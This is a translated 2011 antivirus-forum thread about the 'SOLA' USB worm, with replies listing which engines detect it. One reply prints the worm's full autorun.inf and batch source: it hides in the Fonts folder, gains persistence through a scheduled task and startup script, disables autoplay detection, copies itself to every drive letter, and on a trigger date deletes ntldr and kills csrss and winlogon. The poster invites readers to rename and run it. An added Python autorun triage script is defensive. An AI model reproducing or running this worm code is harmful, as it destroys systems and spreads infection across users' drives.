Views: 6623 | Replies: 46

[Virus sample] A SOLA sample, and it looks like it still gets past quite a few engines

schumi小粉
Posted on 2011-7-17 08:43:58
Already reported to ESET

http://samples.eset.com.cn/index ... 16b797aa8e3deb261ed



http://www.virustotal.com/file-s ... 34686b4a-1310862995

C.C.
Posted on 2011-7-17 08:47:22
360SD
C:\Documents and Settings\Administrator\桌面\fg.zip=>fg.com        Malicious program (BAT.Agent.F)        Deleted
dljsxyls
Posted on 2011-7-17 08:48:50
Last edited by dljsxyls on 2011-7-17 11:01

[autorun]
  shell\打开(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
  shell=打开(&O)
  shell\open=复制磁盘(&C)
  shell\open\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
  shell\open\Default=1
  shell\explore=资源管理器(&X)
  shell\explore\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
  The virus drops the following files in the Fonts directory:
  %systemroot%\Fonts\Regedit.reg
  %systemroot%\Fonts\sleep.exe
  %systemroot%\Fonts\SOLA.BAT
  %systemroot%\Fonts\est_type2032.fon
  It also creates a folder in the Fonts directory:
  %systemroot%\Fonts\solasetup
  And drops a file in the scheduled-tasks directory:
  %systemroot%\Tasks\Tasks.job
  Virus code:
  -----
  @echo off
  set sola=%systemroot%\Fonts
  set setup=%systemroot%\Fonts\solasetup
  if not "%1"=="-USB" goto Start
  start /max ..
  if exist %sola%\SOLA.BAT goto End
  ::========================Infect==============================
  :Infect
  cd\
  md %systemroot%\Fonts\solasetup
  ::————文件复制---------
  copy sola\Autorun.inf %setup%\Autorun.inf
  copy sola\SOLA.BAT %setup%\SOLA.BAT
  copy sola\宅男请进.RAR %setup%\宅男请进.RAR
  copy sola\Tasks.xxx %setup%\Tasks.xxx
  copy sola\sleep.exe %setup%\sleep.exe
  tasklist >%sola%\task.txt
  FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i
  copy %systemroot%\system32\cmd.exe %sola%\%svchost%
  del %sola%\task.txt
  :Tasks
  copy %setup%\Tasks.xxx %systemroot%\Tasks\Tasks.job
  schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFail
  goto TaskSuc
  :TaskFail
  %homedrive%
  cd "%ALLUSERSPROFILE%"
  cd 「开始」菜单\程序\启动
  echo On Error Resume Next>SOLA.VBS
  echo set ws=wscript.createobject("wscript.shell")>>SOLA.VBS
  echo ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT",0 >>SOLA.VBS
  copy SOLA.VBS %sola%\SOLA.VBS
  echo NT>%systemroot%\Fonts\NoTasks
  :TaskSuc
  attrib %systemroot%\Tasks\Tasks.job +s +h +r
  copy %setup%\sola.bat %sola%\sola.bat
  copy %setup%\sleep.exe %systemroot%\system32\sleep.exe
  :NoAutoPlay
  net stop "Shell Hardware Detection"
  echo Windows Registry Editor Version 5.00>%systemroot%\Fonts\Regedit.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\Regedit.reg
  echo "Start"=dword:00000004>>%systemroot%\Fonts\Regedit.reg
  start regedit /s %systemroot%\Fonts\Regedit.reg
  :KillTMG
  goto End
  ::======================Infect======================================
  ::======================Start=======================================
  :Start
  %homedrive%
  cd "%ALLUSERSPROFILE%"
  cd 「开始」菜单\程序\启动
  date /t >%sola%\est_type2032.fon
  findstr /c:"-10-01" "%sola%\est_type2032.fon" & if not errorlevel 1 goto DayOn
  if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
  :Continue
  sleep 300&set C=0 & echo 1>C:\solachk1 & findstr . C:\solachk1 & if not errorlevel 1 del C:\solachk1 & sleep 1000&set C=1 & findstr /C:"SOLA_1.0" C:\Autorun.inf & if errorlevel 1 attrib -s -h -r C:\Autorun.inf&copy /y %setup%\Autorun.inf C:\Autorun.inf&attrib C:\Autorun.inf +s +h +r&md C:\SOLA&copy /y "%setup%\*" C:\SOLA\*&attrib C:\SOLA +s +h +r
  sleep 300&set D=0 & echo 1>D:\solachk1 & findstr . D:\solachk1 & if not errorlevel 1 del D:\solachk1 & sleep 1000&set D=1 & findstr /C:"SOLA_1.0" D:\Autorun.inf & if errorlevel 1 attrib -s -h -r D:\Autorun.inf&copy /y %setup%\Autorun.inf D:\Autorun.inf&attrib D:\Autorun.inf +s +h +r&md D:\SOLA&copy /y "%setup%\*" D:\SOLA\*&attrib D:\SOLA +s +h +r
  sleep 300&set E=0 & echo 1>E:\solachk1 & findstr . E:\solachk1 & if not errorlevel 1 del E:\solachk1 & sleep 1000&set E=1 & findstr /C:"SOLA_1.0" E:\Autorun.inf & if errorlevel 1 attrib -s -h -r E:\Autorun.inf&copy /y %setup%\Autorun.inf E:\Autorun.inf&attrib E:\Autorun.inf +s +h +r&md E:\SOLA&copy /y "%setup%\*" E:\SOLA\*&attrib E:\SOLA +s +h +r
  sleep 300&set F=0 & echo 1>F:\solachk1 & findstr . F:\solachk1 & if not errorlevel 1 del F:\solachk1 & sleep 1000&set F=1 & findstr /C:"SOLA_1.0" F:\Autorun.inf & if errorlevel 1 attrib -s -h -r F:\Autorun.inf&copy /y %setup%\Autorun.inf F:\Autorun.inf&attrib F:\Autorun.inf +s +h +r&md F:\SOLA&copy /y "%setup%\*" F:\SOLA\*&attrib F:\SOLA +s +h +r
  sleep 300&set G=0 & echo 1>G:\solachk1 & findstr . G:\solachk1 & if not errorlevel 1 del G:\solachk1 & sleep 1000&set G=1 & findstr /C:"SOLA_1.0" G:\Autorun.inf & if errorlevel 1 attrib -s -h -r G:\Autorun.inf&copy /y %setup%\Autorun.inf G:\Autorun.inf&attrib G:\Autorun.inf +s +h +r&md G:\SOLA&copy /y "%setup%\*" G:\SOLA\*&attrib G:\SOLA +s +h +r
  if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
  sleep 300&set H=0 & echo 1>H:\solachk1 & findstr . H:\solachk1 & if not errorlevel 1 del H:\solachk1 & sleep 1000&set H=1 & findstr /C:"SOLA_1.0" H:\Autorun.inf & if errorlevel 1 attrib -s -h -r H:\Autorun.inf&copy /y %setup%\Autorun.inf H:\Autorun.inf&attrib H:\Autorun.inf +s +h +r&md H:\SOLA&copy /y "%setup%\*" H:\SOLA\*&attrib H:\SOLA +s +h +r
  sleep 300&set I=0 & echo 1>I:\solachk1 & findstr . I:\solachk1 & if not errorlevel 1 del I:\solachk1 & sleep 1000&set I=1 & findstr /C:"SOLA_1.0" I:\Autorun.inf & if errorlevel 1 attrib -s -h -r I:\Autorun.inf&copy /y %setup%\Autorun.inf I:\Autorun.inf&attrib I:\Autorun.inf +s +h +r&md I:\SOLA&copy /y "%setup%\*" I:\SOLA\*&attrib I:\SOLA +s +h +r
  sleep 300&set J=0 & echo 1>J:\solachk1 & findstr . J:\solachk1 & if not errorlevel 1 del J:\solachk1 & sleep 1000&set J=1 & findstr /C:"SOLA_1.0" J:\Autorun.inf & if errorlevel 1 attrib -s -h -r J:\Autorun.inf&copy /y %setup%\Autorun.inf J:\Autorun.inf&attrib J:\Autorun.inf +s +h +r&md J:\SOLA&copy /y "%setup%\*" J:\SOLA\*&attrib J:\SOLA +s +h +r
  sleep 300&set K=0 & echo 1>K:\solachk1 & findstr . K:\solachk1 & if not errorlevel 1 del K:\solachk1 & sleep 1000&set K=1 & findstr /C:"SOLA_1.0" K:\Autorun.inf & if errorlevel 1 attrib -s -h -r K:\Autorun.inf&copy /y %setup%\Autorun.inf K:\Autorun.inf&attrib K:\Autorun.inf +s +h +r&md K:\SOLA&copy /y "%setup%\*" K:\SOLA\*&attrib K:\SOLA +s +h +r
  sleep 300&set L=0 & echo 1>L:\solachk1 & findstr . L:\solachk1 & if not errorlevel 1 del L:\solachk1 & sleep 1000&set L=1 & findstr /C:"SOLA_1.0" L:\Autorun.inf & if errorlevel 1 attrib -s -h -r L:\Autorun.inf&copy /y %setup%\Autorun.inf L:\Autorun.inf&attrib L:\Autorun.inf +s +h +r&md L:\SOLA&copy /y "%setup%\*" L:\SOLA\*&attrib L:\SOLA +s +h +r
  sleep 300&set M=0 & echo 1>M:\solachk1 & findstr . M:\solachk1 & if not errorlevel 1 del M:\solachk1 & sleep 1000&set M=1 & findstr /C:"SOLA_1.0" M:\Autorun.inf & if errorlevel 1 attrib -s -h -r M:\Autorun.inf&copy /y %setup%\Autorun.inf M:\Autorun.inf&attrib M:\Autorun.inf +s +h +r&md M:\SOLA&copy /y "%setup%\*" M:\SOLA\*&attrib M:\SOLA +s +h +r
  sleep 300&set N=0 & echo 1>N:\solachk1 & findstr . N:\solachk1 & if not errorlevel 1 del N:\solachk1 & sleep 1000&set N=1 & findstr /C:"SOLA_1.0" N:\Autorun.inf & if errorlevel 1 attrib -s -h -r N:\Autorun.inf&copy /y %setup%\Autorun.inf N:\Autorun.inf&attrib N:\Autorun.inf +s +h +r&md N:\SOLA&copy /y "%setup%\*" N:\SOLA\*&attrib N:\SOLA +s +h +r
  if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
  sleep 300&set O=0 & echo 1>O:\solachk1 & findstr . O:\solachk1 & if not errorlevel 1 del O:\solachk1 & sleep 1000&set O=1 & findstr /C:"SOLA_1.0" O:\Autorun.inf & if errorlevel 1 attrib -s -h -r O:\Autorun.inf&copy /y %setup%\Autorun.inf O:\Autorun.inf&attrib O:\Autorun.inf +s +h +r&md O:\SOLA&copy /y "%setup%\*" O:\SOLA\*&attrib O:\SOLA +s +h +r
  sleep 300&set P=0 & echo 1>P:\solachk1 & findstr . P:\solachk1 & if not errorlevel 1 del P:\solachk1 & sleep 1000&set P=1 & findstr /C:"SOLA_1.0" P:\Autorun.inf & if errorlevel 1 attrib -s -h -r P:\Autorun.inf&copy /y %setup%\Autorun.inf P:\Autorun.inf&attrib P:\Autorun.inf +s +h +r&md P:\SOLA&copy /y "%setup%\*" P:\SOLA\*&attrib P:\SOLA +s +h +r
  sleep 300&set Q=0 & echo 1>Q:\solachk1 & findstr . Q:\solachk1 & if not errorlevel 1 del Q:\solachk1 & sleep 1000&set Q=1 & findstr /C:"SOLA_1.0" Q:\Autorun.inf & if errorlevel 1 attrib -s -h -r Q:\Autorun.inf&copy /y %setup%\Autorun.inf Q:\Autorun.inf&attrib Q:\Autorun.inf +s +h +r&md Q:\SOLA&copy /y "%setup%\*" Q:\SOLA\*&attrib Q:\SOLA +s +h +r
  sleep 300&set R=0 & echo 1>R:\solachk1 & findstr . R:\solachk1 & if not errorlevel 1 del R:\solachk1 & sleep 1000&set R=1 & findstr /C:"SOLA_1.0" R:\Autorun.inf & if errorlevel 1 attrib -s -h -r R:\Autorun.inf&copy /y %setup%\Autorun.inf R:\Autorun.inf&attrib R:\Autorun.inf +s +h +r&md R:\SOLA&copy /y "%setup%\*" R:\SOLA\*&attrib R:\SOLA +s +h +r
  sleep 300&set S=0 & echo 1>S:\solachk1 & findstr . S:\solachk1 & if not errorlevel 1 del S:\solachk1 & sleep 1000&set S=1 & findstr /C:"SOLA_1.0" S:\Autorun.inf & if errorlevel 1 attrib -s -h -r S:\Autorun.inf&copy /y %setup%\Autorun.inf S:\Autorun.inf&attrib S:\Autorun.inf +s +h +r&md S:\SOLA&copy /y "%setup%\*" S:\SOLA\*&attrib S:\SOLA +s +h +r
  if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
  sleep 300&set T=0 & echo 1>T:\solachk1 & findstr . T:\solachk1 & if not errorlevel 1 del T:\solachk1 & sleep 1000&set T=1 & findstr /C:"SOLA_1.0" T:\Autorun.inf & if errorlevel 1 attrib -s -h -r T:\Autorun.inf&copy /y %setup%\Autorun.inf T:\Autorun.inf&attrib T:\Autorun.inf +s +h +r&md T:\SOLA&copy /y "%setup%\*" T:\SOLA\*&attrib T:\SOLA +s +h +r
  sleep 300&set U=0 & echo 1>U:\solachk1 & findstr . U:\solachk1 & if not errorlevel 1 del U:\solachk1 & sleep 1000&set U=1 & findstr /C:"SOLA_1.0" U:\Autorun.inf & if errorlevel 1 attrib -s -h -r U:\Autorun.inf&copy /y %setup%\Autorun.inf U:\Autorun.inf&attrib U:\Autorun.inf +s +h +r&md U:\SOLA&copy /y "%setup%\*" U:\SOLA\*&attrib U:\SOLA +s +h +r
  sleep 300&set V=0 & echo 1>V:\solachk1 & findstr . V:\solachk1 & if not errorlevel 1 del V:\solachk1 & sleep 1000&set V=1 & findstr /C:"SOLA_1.0" V:\Autorun.inf & if errorlevel 1 attrib -s -h -r V:\Autorun.inf&copy /y %setup%\Autorun.inf V:\Autorun.inf&attrib V:\Autorun.inf +s +h +r&md V:\SOLA&copy /y "%setup%\*" V:\SOLA\*&attrib V:\SOLA +s +h +r
  sleep 300&set W=0 & echo 1>W:\solachk1 & findstr . W:\solachk1 & if not errorlevel 1 del W:\solachk1 & sleep 1000&set W=1 & findstr /C:"SOLA_1.0" W:\Autorun.inf & if errorlevel 1 attrib -s -h -r W:\Autorun.inf&copy /y %setup%\Autorun.inf W:\Autorun.inf&attrib W:\Autorun.inf +s +h +r&md W:\SOLA&copy /y "%setup%\*" W:\SOLA\*&attrib W:\SOLA +s +h +r
  sleep 300&set X=0 & echo 1>X:\solachk1 & findstr . X:\solachk1 & if not errorlevel 1 del X:\solachk1 & sleep 1000&set X=1 & findstr /C:"SOLA_1.0" X:\Autorun.inf & if errorlevel 1 attrib -s -h -r X:\Autorun.inf&copy /y %setup%\Autorun.inf X:\Autorun.inf&attrib X:\Autorun.inf +s +h +r&md X:\SOLA&copy /y "%setup%\*" X:\SOLA\*&attrib X:\SOLA +s +h +r
  sleep 300&set Y=0 & echo 1>Y:\solachk1 & findstr . Y:\solachk1 & if not errorlevel 1 del Y:\solachk1 & sleep 1000&set Y=1 & findstr /C:"SOLA_1.0" Y:\Autorun.inf & if errorlevel 1 attrib -s -h -r Y:\Autorun.inf&copy /y %setup%\Autorun.inf Y:\Autorun.inf&attrib Y:\Autorun.inf +s +h +r&md Y:\SOLA&copy /y "%setup%\*" Y:\SOLA\*&attrib Y:\SOLA +s +h +r
  sleep 300&set Z=0 & echo 1>Z:\solachk1 & findstr . Z:\solachk1 & if not errorlevel 1 del Z:\solachk1 & sleep 1000&set Z=1 & findstr /C:"SOLA_1.0" Z:\Autorun.inf & if errorlevel 1 attrib -s -h -r Z:\Autorun.inf&copy /y %setup%\Autorun.inf Z:\Autorun.inf&attrib Z:\Autorun.inf +s +h +r&md Z:\SOLA&copy /y "%setup%\*" Z:\SOLA\*&attrib Z:\SOLA +s +h +r
  if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
  %systemdrive%
  sleep 5000
  goto Start
  :DayOn
  attrib %systemdrive%\ntldr -s -h -r & del /q /a %systemdrive%\ntldr & shutdown -r -t 10 -c "您的计算机上带有SOLA病毒,今天是它的发作日期。病毒已经破坏了您的系统,您的计算机将在10秒钟后重启。" & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn csrss.exe',0);window.close()"
  sleep 10000
  if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn winlogon.exe',0);window.close()"
  goto Start
  ::=====================Start=========================================
  :End

Does not run properly under Windows 7.

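As an added example (my own code, not part of the post above and not from the sample), here is a small Python triage script for autorun.inf files of the shape quoted in that post. It parses the [autorun] section and flags the tricks this worm relies on: verb command lines that call a script host (mshta, WScript.Shell, a .bat), the default verb redirected with a bare shell= entry, the built-in Open/Explore verbs relabeled so the right-click menu looks normal, and every verb pointing at the same payload. The two inputs are constructed inline: SOLA_AUTORUN is the autorun.inf from the post, BENIGN_AUTORUN is an invented harmless disc-label file. The token list and the four checks are my choices, not a published signature.

```python
import re
from typing import Dict, List

# Constructed sample 1: the autorun.inf quoted in the post above (verbatim).
SOLA_AUTORUN = r"""[autorun]
shell\打开(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell=打开(&O)
shell\open=复制磁盘(&C)
shell\open\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
"""

# Constructed sample 2: an invented, harmless autorun.inf (icon and label only).
BENIGN_AUTORUN = """[autorun]
icon=setup.ico
label=Driver CD
"""

# Tokens that have no business in a removable-media verb command line (my list).
SUSPICIOUS_TOKENS = ("mshta", "javascript:", "activexobject", "wscript.shell",
                     "cmd", ".bat", ".cmd", ".vbs", "powershell", "rundll32")


def parse_autorun(text: str) -> Dict[str, str]:
    """Return key -> value for the [autorun] section.

    Keys are lower-cased (Windows treats them case-insensitively); insertion
    order is preserved so findings come out in file order.
    """
    entries: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def triage_autorun(text: str) -> List[str]:
    """Return a list of human-readable findings; empty means nothing suspicious."""
    findings: List[str] = []
    entries = parse_autorun(text)
    if not entries:
        return findings

    # 1. Any verb command line (open=, shellexecute=, shell\<verb>\command=)
    #    that launches a script host or shell instead of a plain installer.
    for key, value in entries.items():
        is_cmd = key in ("open", "shellexecute") or (
            key.startswith("shell\\") and key.endswith("\\command"))
        if is_cmd:
            hits = [t for t in SUSPICIOUS_TOKENS if t in value.lower()]
            if hits:
                findings.append(f"{key}: launches script host/shell ({', '.join(hits)})")

    # 2. A bare shell= entry makes a custom verb the default action, so Enter or
    #    a double-click on the drive runs it instead of opening the folder.
    if "shell" in entries:
        findings.append(f"shell={entries['shell']}: default verb redirected to a custom verb")

    # 3. Built-in verbs relabeled (here Open -> 'Copy disk', Explore -> 'Explorer')
    #    and re-pointed, so the context menu looks normal but every entry is the payload.
    for verb in ("open", "explore"):
        key = "shell\\" + verb
        if key in entries and key + "\\command" in entries:
            findings.append(f"{key}: built-in verb relabeled '{entries[key]}' and re-pointed")

    # 4. Several verbs sharing one identical command line is a worm tell:
    #    legitimate media never wires Open and Explore to the same executable.
    cmds = [v for k, v in entries.items() if k.endswith("\\command")]
    if len(cmds) >= 2 and len(set(cmds)) == 1:
        findings.append(f"{len(cmds)} verbs share one command line")
    return findings


def verdict(text: str) -> str:
    return "malicious" if triage_autorun(text) else "clean"


if __name__ == "__main__":
    for name, sample in (("SOLA", SOLA_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(f"{name}: {verdict(sample)}")
        for finding in triage_autorun(sample):
            print("  -", finding)
```

To run it against a real drive, read the root autorun.inf with the codepage the box uses (the labels in this sample are Chinese text, so on a Chinese-locale machine that would be GBK; an assumption, not something the post states) and pass the decoded string to triage_autorun. Check 1 alone catches this sample; checks 2 to 4 are there so a variant that swaps mshta for some other launcher still trips on its menu manipulation.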
留侯
Posted on 2011-7-17 09:04:41
Dr.Web cleans it; reported.
schumi小粉
OP | Posted on 2011-7-17 09:06:03
Quoting dljsxyls, posted 2011-7-17 08:48:
[autorun]
  shell\打开(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SO ...

Change the extension to .bat and run it~
maomao110
Posted on 2011-7-17 09:24:41
Saw the multi-engine scan result, AVG miss, so I'm not downloading it.
IOOOOI
Posted on 2011-7-17 09:26:07
VBS.Runauto
Norton: KILL.
电影结束了
Posted on 2011-7-17 09:26:15
Won't run under XP...
Mr.Tong
Posted on 2011-7-17 09:31:17
pass kis2012
星晨
Posted on 2011-7-17 09:32:29
BitDefender: reported.
Copyright © KaFan  KaFan.cn All Rights Reserved.